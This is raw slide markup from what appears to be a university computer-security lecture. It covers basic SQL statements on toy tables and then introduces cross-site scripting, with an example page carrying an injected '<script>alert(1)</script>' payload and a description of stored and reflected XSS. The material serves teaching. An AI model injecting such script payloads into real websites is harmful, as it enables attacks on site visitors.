          <a:off x="278300" y="2949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{1259CCB7-25B7-41DD-B261-6AF800CFBF2F}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="466675"/>
                <a:gridCol w="1148375"/>
              </a:tblGrid>
              <a:tr h="36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161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161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161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5486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2 columns</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc hMerge="1"/>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="229" name="Google Shape;229;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="223575" y="2511725"/>
            <a:ext cx="4411500" cy="5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SELECT 'CS', '161' FROM bots</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="230" name="Google Shape;230;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="312500" y="1244825"/>
            <a:ext cx="3504900" cy="4002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constants instead of columns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WHERE</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="236" name="Google Shape;236;p33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WHERE can be used to filter out certain rows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Arithmetic comparison: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/>
              <a:t>,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"/>
              <a:t>,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/>
              <a:t>,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&gt;=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>,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/>
              <a:t>,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&lt;&gt;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Arithmetic operators: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/>
              <a:t>,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/>
              <a:t> ,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/>
              <a:t> ,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/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Boolean operators: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/>
              <a:t>,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OR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AND has precedence over OR</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="237" name="Google Shape;23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38" name="Google Shape;238;p33"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5488250" y="214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{1259CCB7-25B7-41DD-B261-6AF800CFBF2F}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="383925"/>
                <a:gridCol w="944775"/>
                <a:gridCol w="1615075"/>
                <a:gridCol w="589125"/>
              </a:tblGrid>
              <a:tr h="1289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b="1" i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  <a:tr h="12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WHERE</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="244" name="Google Shape;24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45" name="Google Shape;245;p34"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5488250" y="214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{1259CCB7-25B7-41DD-B261-6AF800CFBF2F}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="383925"/>
                <a:gridCol w="944775"/>
                <a:gridCol w="1615075"/>
                <a:gridCol w="589125"/>
              </a:tblGrid>
              <a:tr h="1289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b="1" i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  <a:tr h="12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246" name="Google Shape;246;p34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="223575" y="2206925"/>
            <a:ext cx="44115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SELECT * FROM bots</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1"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WHERE likes = 'pancakes'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7" name="Google Shape;247;p34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="312500" y="1244825"/>
            <a:ext cx="3504900" cy="6156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Choose only the rows where the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likes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> column has value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pancakes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248" name="Google Shape;248;p34"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="312500" y="298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{1259CCB7-25B7-41DD-B261-6AF800CFBF2F}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="383925"/>
                <a:gridCol w="944775"/>
                <a:gridCol w="1615075"/>
                <a:gridCol w="589125"/>
              </a:tblGrid>
              <a:tr h="12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 row, 4 columns</a:t>
                      </a:r>
                      <a:endParaRPr sz="12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WHERE</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="254" name="Google Shape;25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55" name="Google Shape;255;p35"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5488250" y="214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{1259CCB7-25B7-41DD-B261-6AF800CFBF2F}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="383925"/>
                <a:gridCol w="944775"/>
                <a:gridCol w="1615075"/>
                <a:gridCol w="589125"/>
              </a:tblGrid>
              <a:tr h="1289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b="1" i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  <a:tr h="12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256" name="Google Shape;256;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="223575" y="2206925"/>
            <a:ext cx="44115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SELECT name FROM bots</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1"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WHERE age &lt; 2 OR id = 1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7" name="Google Shape;257;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="312500" y="1244825"/>
            <a:ext cx="3504900" cy="6156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all names of bots whose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/>
              <a:t> is less than 2 or whose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/>
              <a:t> is 1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258" name="Google Shape;258;p35"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="298500" y="298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{1259CCB7-25B7-41DD-B261-6AF800CFBF2F}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1433800"/>
              </a:tblGrid>
              <a:tr h="322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22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22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52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 rows, 1 column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59" name="Google Shape;259;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1798650" y="3318475"/>
            <a:ext cx="2250600" cy="3693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(selected because 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200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is 1)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0" name="Google Shape;260;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1798650" y="3718675"/>
            <a:ext cx="2250600" cy="3693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(selected because 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 sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is 1.5)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XSS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p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Websites use untrusted content as control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○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&lt;html&gt;&lt;body&gt;Hello </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1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EvanBot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!&lt;/body&gt;&lt;/html&gt;</a:t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○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&lt;html&gt;&lt;body&gt;Hello </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1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&lt;script&gt;alert(1)&lt;/script&gt;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!&lt;/body&gt;&lt;/html&gt;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Stored XSS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attacker’s JavaScript is stored on the legitimate server and sent to browsers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Classic example: Make a post on a social media site (e.g. Facebook) with JavaScript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Reflected XSS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attacker causes the victim to input JavaScript into a request, and the content it’s reflected (copied) in the response from the server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Classic example: Create a link for a search engine (e.g. Google) query with JavaScript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Requires the victim to click on the link with JavaScript</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="Google Shape;8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INSERT INTO</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="266" name="Google Shape;266;p36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INSERT INTO is used to add rows into a table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VALUES is used for defining constant rows and columns, usually to be inserted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7" name="Google Shape;26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68" name="Google Shape;268;p36"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5488250" y="214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{1259CCB7-25B7-41DD-B261-6AF800CFBF2F}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="383925"/>
                <a:gridCol w="944775"/>
                <a:gridCol w="1615075"/>
                <a:gridCol w="589125"/>
              </a:tblGrid>
              <a:tr h="1289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b="1" i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  <a:tr h="12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INSERT INTO</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="274" name="Google Shape;27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75" name="Google Shape;275;p37"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5488250" y="1705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{1259CCB7-25B7-41DD-B261-6AF800CFBF2F}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="383925"/>
                <a:gridCol w="944775"/>
                <a:gridCol w="1615075"/>
                <a:gridCol w="589125"/>
              </a:tblGrid>
              <a:tr h="1289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b="1" i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  <a:tr h="12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willow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catnip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luna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naps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 rows, 4 columns</a:t>
                      </a:r>
                      <a:endParaRPr sz="12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276" name="Google Shape;276;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="223575" y="1860333"/>
            <a:ext cx="4411500" cy="1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INSERT INTO items VALUES</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1"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(4, 'willow', 'catnip', 5),</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1"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(5, 'luna', 'naps', 7)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77" name="Google Shape;277;p37"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1347300" y="3622175"/>
            <a:ext cx="4140950" cy="615600"/>
            <a:chOff x="1347300" y="3622175"/>
            <a:chExt cx="4140950" cy="615600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="278" name="Google Shape;278;p37"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4503350" y="3759000"/>
              <a:ext cx="984900" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln cap="flat" cmpd="sng" w="19050">
              <a:solidFill>
                <a:srgbClr val="E69138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9" name="Google Shape;279;p37"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4503350" y="4068700"/>
              <a:ext cx="984900" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln cap="flat" cmpd="sng" w="19050">
              <a:solidFill>
                <a:srgbClr val="E69138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80" name="Google Shape;280;p37"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1347300" y="3622175"/>
              <a:ext cx="3224700" cy="6156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This statement results in two extra rows being added to the table</a:t>
              </a:r>
              <a:endParaRPr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UPDATE</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="286" name="Google Shape;286;p38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UPDATE is used to change the values of existing rows in a table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Followed by SET after the table name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Usually combined with WHERE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Syntax:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:b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UPDATE [table]</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1"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SET [column] = [value]</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1"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WHERE [condition]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7" name="Google Shape;28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88" name="Google Shape;288;p38"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5488250" y="1705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{1259CCB7-25B7-41DD-B261-6AF800CFBF2F}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="383925"/>
                <a:gridCol w="944775"/>
                <a:gridCol w="1615075"/>
                <a:gridCol w="589125"/>
              </a:tblGrid>
              <a:tr h="1289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b="1" i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  <a:tr h="12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willow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catnip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luna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naps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 rows, 4 columns</a:t>
                      </a:r>
                      <a:endParaRPr sz="12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3" name="Google Shape;293;p39"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5488250" y="1705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{1259CCB7-25B7-41DD-B261-6AF800CFBF2F}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="383925"/>
                <a:gridCol w="944775"/>
                <a:gridCol w="1615075"/>
                <a:gridCol w="589125"/>
              </a:tblGrid>
              <a:tr h="1289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b="1" i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  <a:tr h="12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willow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catnip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luna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naps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 rows, 4 columns</a:t>
                      </a:r>
                      <a:endParaRPr sz="12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294" name="Google Shape;294;p39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UPDATE</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="295" name="Google Shape;295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" name="Google Shape;296;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="223575" y="1860333"/>
            <a:ext cx="4411500" cy="1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UPDATE bots</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1"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SET age = 6</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1"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WHERE name = 'willow'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97" name="Google Shape;297;p39"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1347300" y="3136575"/>
            <a:ext cx="7339225" cy="1707075"/>
            <a:chOff x="1347300" y="3136575"/>
            <a:chExt cx="7339225" cy="1707075"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="298" name="Google Shape;298;p39"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2913750" y="3899750"/>
              <a:ext cx="5772775" cy="943900"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="37756" w="230911">
                  <a:moveTo>
                    <a:pt x="0" y="4651"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="37756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230911" y="37756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230911" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln cap="flat" cmpd="sng" w="19050">
              <a:solidFill>
                <a:srgbClr val="E69138"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd len="med" w="med" type="none"/>
              <a:tailEnd len="med" w="med" type="triangle"/>
            </a:ln>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="299" name="Google Shape;299;p39"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1347300" y="3136575"/>
              <a:ext cx="3224700" cy="10467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This statement results in this cell in the table being changed. If the </a:t>
              </a:r>
              <a:r>
                <a:rPr b="1" lang="en">
                  <a:latin typeface="Courier New"/>
                  <a:ea typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                  <a:sym typeface="Courier New"/>
                </a:rPr>
                <a:t>WHERE</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en"/>
                <a:t> clause was missing, every value in the </a:t>
              </a:r>
              <a:r>
                <a:rPr b="1" lang="en">
                  <a:latin typeface="Courier New"/>
                  <a:ea typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                  <a:sym typeface="Courier New"/>
                </a:rPr>
                <a:t>age</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en"/>
                <a:t> column would be set to 6.</a:t>
              </a:r>
              <a:endParaRPr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0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DELETE</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="305" name="Google Shape;305;p40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DELETE FROM is used to delete rows from a table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Usually combined with WHERE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Syntax:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:b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DELETE FROM [table]</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1"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WHERE [condition]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="306" name="Google Shape;306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07" name="Google Shape;307;p40"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5488250" y="1705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{1259CCB7-25B7-41DD-B261-6AF800CFBF2F}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="383925"/>
                <a:gridCol w="944775"/>
                <a:gridCol w="1615075"/>
                <a:gridCol w="589125"/>
              </a:tblGrid>
              <a:tr h="1289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b="1" i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  <a:tr h="12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willow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catnip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luna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naps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 rows, 4 columns</a:t>
                      </a:r>
                      <a:endParaRPr sz="12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2" name="Google Shape;312;p41"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5488250" y="1705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{1259CCB7-25B7-41DD-B261-6AF800CFBF2F}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="383925"/>
                <a:gridCol w="944775"/>
                <a:gridCol w="1615075"/>
                <a:gridCol w="589125"/>
              </a:tblGrid>
              <a:tr h="1289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b="1" i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  <a:tr h="12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endParaRPr b="1" sz="1200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willow</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1200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catnip</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1200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strike="sngStrike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</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1200" strike="sngStrike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endParaRPr b="1" sz="1200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luna</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1200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naps</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1200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strike="sngStrike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</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1200" strike="sngStrike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313" name="Google Shape;313;p41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DELETE</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="314" name="Google Shape;314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5" name="Google Shape;315;p41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="223575" y="1860333"/>
            <a:ext cx="44115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DELETE FROM bots</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1"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WHERE age &gt;= 6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16" name="Google Shape;316;p41"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1347300" y="3622175"/>
            <a:ext cx="4140950" cy="615600"/>
            <a:chOff x="1347300" y="3622175"/>
            <a:chExt cx="4140950" cy="615600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="317" name="Google Shape;317;p41"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4503350" y="3759000"/>
              <a:ext cx="984900" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln cap="flat" cmpd="sng" w="19050">
              <a:solidFill>
                <a:srgbClr val="E69138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18" name="Google Shape;318;p41"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4503350" y="4068700"/>
              <a:ext cx="984900" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln cap="flat" cmpd="sng" w="19050">
              <a:solidFill>
                <a:srgbClr val="E69138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19" name="Google Shape;319;p41"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1347300" y="3622175"/>
              <a:ext cx="3224700" cy="6156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This statement results in two rows being deleted from the table</a:t>
              </a:r>
              <a:endParaRPr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CREATE</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="325" name="Google Shape;325;p42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is used to create tables (and sometimes databases)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6" name="Google Shape;32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27" name="Google Shape;327;p42"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5488250" y="1460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{1259CCB7-25B7-41DD-B261-6AF800CFBF2F}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="383925"/>
                <a:gridCol w="944775"/>
                <a:gridCol w="1615075"/>
                <a:gridCol w="589125"/>
              </a:tblGrid>
              <a:tr h="1289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b="1" i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  <a:tr h="12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3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CREATE</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="333" name="Google Shape;333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34" name="Google Shape;334;p43"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5488250" y="123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{1259CCB7-25B7-41DD-B261-6AF800CFBF2F}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="383925"/>
                <a:gridCol w="944775"/>
                <a:gridCol w="1615075"/>
                <a:gridCol w="589125"/>
              </a:tblGrid>
              <a:tr h="1289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b="1" i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  <a:tr h="12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335" name="Google Shape;335;p43"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5488250" y="3524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{1259CCB7-25B7-41DD-B261-6AF800CFBF2F}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="383925"/>
                <a:gridCol w="944775"/>
                <a:gridCol w="1615075"/>
                <a:gridCol w="589125"/>
              </a:tblGrid>
              <a:tr h="1289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cats</a:t>
                      </a:r>
                      <a:endParaRPr b="1" i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  <a:tr h="12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128925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 rows, 4 columns</a:t>
                      </a:r>
                      <a:endParaRPr sz="12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336" name="Google Shape;336;p43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="223575" y="1469825"/>
            <a:ext cx="4194900" cy="20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CREATE TABLE cats (</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1"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   id INT,</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1"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   name VARCHAR(255),</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1"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   likes VARCHAR(255),</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1"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   age INT</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1"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37" name="Google Shape;337;p43"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="492325" y="3778525"/>
            <a:ext cx="4986300" cy="615600"/>
            <a:chOff x="492325" y="3778525"/>
            <a:chExt cx="4986300" cy="615600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="338" name="Google Shape;338;p43"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="339" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3717025" y="4086325"/>
              <a:ext cx="1761600" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln cap="flat" cmpd="sng" w="19050">
              <a:solidFill>
                <a:srgbClr val="E69138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39" name="Google Shape;339;p43"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="492325" y="3778525"/>
              <a:ext cx="3224700" cy="6156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This statement results in a new table being created with the given columns</a:t>
              </a:r>
              <a:endParaRPr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sp>
        <p:nvSpPr>
          <p:cNvPr id="340" name="Google Shape;340;p43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3608050" y="2049300"/>
            <a:ext cx="1509900" cy="8313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VARCHAR(255)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> is a string type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4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DROP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="346" name="Google Shape;346;p44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DROP is used to delete tables (and sometimes databases)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Syntax:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:b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DROP TABLE [table]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="347" name="Google Shape;347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48" name="Google Shape;348;p44"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5488250" y="123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{1259CCB7-25B7-41DD-B261-6AF800CFBF2F}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="383925"/>
                <a:gridCol w="944775"/>
                <a:gridCol w="1615075"/>
                <a:gridCol w="589125"/>
              </a:tblGrid>
              <a:tr h="1289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b="1" i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  <a:tr h="12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349" name="Google Shape;349;p44"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5488250" y="3524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{1259CCB7-25B7-41DD-B261-6AF800CFBF2F}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="383925"/>
                <a:gridCol w="944775"/>
                <a:gridCol w="1615075"/>
                <a:gridCol w="589125"/>
              </a:tblGrid>
              <a:tr h="1289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cats</a:t>
                      </a:r>
                      <a:endParaRPr b="1" i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  <a:tr h="12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128925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 rows, 4 columns</a:t>
                      </a:r>
                      <a:endParaRPr sz="12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5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DROP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="355" name="Google Shape;355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56" name="Google Shape;356;p45"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5488250" y="123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{1259CCB7-25B7-41DD-B261-6AF800CFBF2F}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="383925"/>
                <a:gridCol w="944775"/>
                <a:gridCol w="1615075"/>
                <a:gridCol w="589125"/>
              </a:tblGrid>
              <a:tr h="1289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b="1" i="1" sz="1200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  <a:tr h="12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b="1" sz="1200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200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b="1" sz="1200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b="1" sz="1200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b="1" sz="1200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b="1" sz="1200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b="1" sz="1200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b="1" sz="1200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b="1" sz="1200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b="1" sz="1200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b="1" sz="1200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200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b="1" sz="1200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b="1" sz="1200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 strike="sngStrike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b="1" sz="1200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8925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 rows, 0 columns</a:t>
                      </a:r>
                      <a:endParaRPr sz="12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357" name="Google Shape;357;p45"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5488250" y="3524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{1259CCB7-25B7-41DD-B261-6AF800CFBF2F}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="383925"/>
                <a:gridCol w="944775"/>
                <a:gridCol w="1615075"/>
                <a:gridCol w="589125"/>
              </a:tblGrid>
              <a:tr h="1289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cats</a:t>
                      </a:r>
                      <a:endParaRPr b="1" i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  <a:tr h="12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128925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 rows, 4 columns</a:t>
                      </a:r>
                      <a:endParaRPr sz="12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358" name="Google Shape;358;p45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
